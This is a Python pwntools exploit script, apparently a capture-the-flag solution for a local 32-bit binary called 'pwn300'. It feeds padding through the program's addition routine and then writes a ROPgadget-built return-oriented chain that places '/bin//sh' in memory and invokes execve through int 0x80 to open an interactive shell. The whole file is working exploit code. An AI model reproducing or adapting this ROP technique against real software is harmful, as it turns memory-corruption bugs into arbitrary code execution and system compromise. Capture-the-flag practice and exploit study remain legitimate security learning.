#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
# execve generated by ROPgadget
from pwn import *
from struct import pack
from libnum import s2n
import sys
context.log_level = "debug"
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]

def debug():
    addr = raw_input("DEBUG: ")
    gdb.attach(io, "b *" + str(addr))

def Add(m):
    io.sendlineafter("result\n", "1")
    io.sendlineafter("x:", '0')
    io.sendlineafter("y:", str(m))

io = process("./pwn300")
io.sendlineafter("calculate:", '100')
# Padding goes here
for i in xrange(16):
    Add(0)

Add(0x0806ed0a) # pop edx ; ret
Add(0x080ea060) # @ .data
Add(0x080bb406) # pop eax ; ret
#  p += '/bin'
Add(s2n("/bin"[::-1]))
Add(0x080a1dad) # mov dword ptr [edx], eax ; ret
Add(0x0806ed0a) # pop edx ; ret
Add(0x080ea064) # @ .data + 4
Add(0x080bb406) # pop eax ; ret
#  p += '//sh'
Add(s2n("//sh"[::-1]))
Add(0x080a1dad) # mov dword ptr [edx], eax ; ret
Add(0x0806ed0a) # pop edx ; ret
Add(0x080ea068) # @ .data + 8
Add(0x08054730) # xor eax, eax ; ret
Add(0x080a1dad) # mov dword ptr [edx], eax ; ret
Add(0x080481c9) # pop ebx ; ret
Add(0x080ea060) # @ .data
Add(0x0806ed31) # pop ecx ; pop ebx ; ret
Add(0x080ea068) # @ .data + 8
Add(0x080ea060) # padding without overwrite ebx
Add(0x0806ed0a) # pop edx ; ret
Add(0x080ea068) # @ .data + 8
Add(0x08054730) # xor eax, eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x0807b75f) # inc eax ; ret
Add(0x08049781) # int 0x80
#  debug()
io.sendlineafter("result\n", "5")
io.interactive()
io.close()
